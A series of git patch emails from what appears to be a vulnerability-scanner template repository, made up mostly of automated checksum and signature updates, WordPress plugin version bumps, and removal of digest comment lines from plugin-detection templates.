wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From fca7af6160ed35e239210f4953552bea14ae9621 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 13:04:12 +0000 Subject: [PATCH 1659/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 60012b925b..15ea9164cc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -31,6 +31,7 @@ on: - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-4885.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' + - 'http/cves/2024/CVE-2024-5315.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/cves/2024/CVE-2024-6587.yaml' - 'http/cves/2024/CVE-2024-6646.yaml' From 18f197972af86fdf2aa2687d751e6fb629076d06 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 13:09:51 +0000 Subject: [PATCH 1661/1841] Auto Generated Templates Checksum [Thu Jul 25 13:09:51 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cc0baf76d0..e80de4d40d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -247,7 +247,7 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a4 dast/vulnerabilities/ssrf/blind-ssrf.yaml:062d570ba1c6f5d5a382875b296b337c14f07aee dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 -dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 +dast/vulnerabilities/xss/dom-xss.yaml:9124f677d44a4f4303afe65cd65b3de0bc2327bd dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:d803e0d74fa83905be163e717878cc00b647a58b dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a @@ -3500,7 +3500,7 @@ http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c -http/cves/2024/CVE-2024-38289.yaml:c6c9991b71e360f1071113d9a5a70fcbd13ad39f +http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf @@ -6005,7 +6005,7 @@ http/misconfiguration/springboot/springboot-threaddump.yaml:c47af0dade8ae96dd8b3 http/misconfiguration/springboot/springboot-trace.yaml:a9e0cdf03cba6bd28b52ad7e2ab0174745c638da http/misconfiguration/sql-server-report-viewer.yaml:cce6309b5b0a456fa34db30015e028db0b81f0be http/misconfiguration/ssrf-via-oauth-misconfig.yaml:1e1ec614f023cbb22a5c7bf5eed4e3c3ffe272f6 -http/misconfiguration/ssrpm-arbitrary-password-reset.yaml:4413a1c2a718d1ddf9b8aaf14c81cbd48adc493a +http/misconfiguration/ssrpm-arbitrary-password-reset.yaml:d4925b5091bfd820eadfe21fa85d62e7e1a11729 http/misconfiguration/struts-ognl-console.yaml:f32871fc3e05d8a7901b9a4d873b0ca9f77ab646 http/misconfiguration/symfony-debug.yaml:3bee3431aa9041e36dab6a3f95fd67af5bf23454 http/misconfiguration/symfony-fosjrouting-bundle.yaml:e246351ce97fbf8db877bf81e95ed713cae4bed4 @@ -8929,7 +8929,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:00e78793f9b81f4609f8edff1855dc716dced779 +templates-checksum.txt:c1c330aa63ecaaa885252cc777746f16f8fcd449 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From c5842547af176195cd0629994f2b000a4ae40392 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 13:11:43 +0000 Subject: [PATCH 1662/1841] Auto Template Signing [Thu Jul 25 13:11:43 UTC 2024] :robot: --- dast/vulnerabilities/xss/dom-xss.yaml | 2 +- http/cves/2024/CVE-2024-5315.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml index 04a71e39d7..16f2dbcc62 100644 --- a/dast/vulnerabilities/xss/dom-xss.yaml +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -49,4 +49,4 @@ headless: part: header words: - "text/html" -# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203fa5dea0c77a361e52560e9d8de2a864f932c5a02824f8ba0b5466b232d4282e022100c810527a3d7e205676e9282676aea82fa6d6c7317a2d1789f075362466c2fa60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5315.yaml b/http/cves/2024/CVE-2024-5315.yaml index f33caf9daf..ce10e9861d 100644 --- a/http/cves/2024/CVE-2024-5315.yaml +++ b/http/cves/2024/CVE-2024-5315.yaml @@ -57,3 +57,4 @@ http: part: body_1 words: - SuperAdmin +# digest: 4a0a0047304502205fa272f74338d860a6b47447f08017ae8c60735a051e74848b2cc6c2b2419b44022100bd49eb5ef5d7dbadb31d03259c9ad62c582e4ab4d90856c4421fd4c44a7fd2bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 211f57a7d39537c85ec193cf55b9e9fbcd51f6a8 Mon Sep 17 00:00:00 2001 From: divatchyano <davidgrondin2a@gmail.com> Date: Thu, 25 Jul 2024 20:44:27 +0200 Subject: [PATCH 1663/1841] Update loginpress.txt --- helpers/wordpress/plugins/loginpress.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/loginpress.txt b/helpers/wordpress/plugins/loginpress.txt index afa2b3515e..fd2a01863f 100644 --- a/helpers/wordpress/plugins/loginpress.txt +++ b/helpers/wordpress/plugins/loginpress.txt @@ -1 +1 @@ -1.8.0 \ No newline at end of file +3.1.0 From b225a14596908a2370ff241f695c0a224547da84 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 00:19:50 +0000 Subject: [PATCH 1664/1841] Auto WordPress Plugins Update [Fri Jul 26 00:19:50 UTC 2024] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/autoptimize.txt | 2 +- helpers/wordpress/plugins/contact-form-7.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/ewww-image-optimizer.txt | 2 +- helpers/wordpress/plugins/fluentform.txt | 2 +- helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt | 2 +- helpers/wordpress/plugins/health-check.txt | 2 +- helpers/wordpress/plugins/intuitive-custom-post-order.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/loginizer.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 212 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 738a7f03f6..b7f7949443 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.8 \ No newline at end of file +4.3.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt index c48ab2bc53..ffbbb67770 100644 --- a/helpers/wordpress/plugins/autoptimize.txt +++ b/helpers/wordpress/plugins/autoptimize.txt @@ -1 +1 @@ -3.1.11 \ No newline at end of file +3.1.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 2054231b6a..1358c237c3 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.9.7 \ No newline at end of file +5.9.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 11e61feaba..f8cba501b4 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.23.2 \ No newline at end of file +3.23.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index d21b198c83..9fdf3baef9 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.7.0 \ No newline at end of file +7.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index 221ea9b7b5..50bbc87d9b 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.1.19 \ No newline at end of file +5.1.20 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index dd5f33f3aa..fa5fce04b3 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.28.0 \ No newline at end of file +8.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/health-check.txt b/helpers/wordpress/plugins/health-check.txt index 9dbb0c0052..081af9a10f 100644 --- a/helpers/wordpress/plugins/health-check.txt +++ b/helpers/wordpress/plugins/health-check.txt @@ -1 +1 @@ -1.7.0 \ No newline at end of file +1.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/intuitive-custom-post-order.txt b/helpers/wordpress/plugins/intuitive-custom-post-order.txt index 97ceee1b9f..82032acd84 100644 --- a/helpers/wordpress/plugins/intuitive-custom-post-order.txt +++ b/helpers/wordpress/plugins/intuitive-custom-post-order.txt @@ -1 +1 @@ -3.1.5 \ No newline at end of file +3.1.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index d86af731a6..70bbe8a138 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.49 \ No newline at end of file +3.2.50 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index 5af131d650..abb1658232 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.8.9 \ No newline at end of file +1.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index d5724cd41b..9aa34646dc 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.6.2 \ No newline at end of file +2.7.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 0314ba5311..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034fcf867c9abfc689d16b9c555f6454aee32665f037279b5509374ebcded97d40220505c547bd95fcb0739b060f48baa050d2d762b2b9c2d8b738e6e10edd8f3fd5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 90da5258ab..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0709ea6d503ed482fefb318bea10835f2193c017194c0d52c4c5aa6a3fb04660220584e826d197c7067bf67cb20221ff351f2ee62d21252e797b3453324bf69f0b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 73b0d612cf..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024917a9f94f2b5338542fc790d99ed4cedd16227a757e404ccb0d73e279179510221008d9a5fe2d93288404881824393b6e6d56ae58bc3f86fd2cbdc7ed05a0fcdd729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 63b0b2a11e..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b890ac046a55a278aa61af482b8eb4f45df5fd194fd9518c9f5b1d7e12cde60022100817c92bb3b80451aa480a0a96dde6e93c86591ea99f5f82fdb1ae01d3521f9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 34672c123d..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046966a6d52da4acf98c99ee516920f130387fe48b0a265d2e2b53a11017880080220063c4a912d71538eced91f2db2f2ef17df5018ff75c444cdebcde2a9a8a681f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8deb6f135d..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2c5ed9a4c23fc247cfff51a0d996db335488d53257582a1f548dfefa4f322d1022100a1be65203deb646239f3b6bb1e9abdd0307a2f280a350b047da0e47bc83188c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index e7a9a2567e..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c48afe53efb5779ddcf713551e8c1d0ccb2dc356ab1bc3c09f278aec163c06cd0220444dd4796bf505401b45e753a013612b1e4b6c1ee2bc7ba1806b15d9c1ef448f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index ea466e27ff..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ 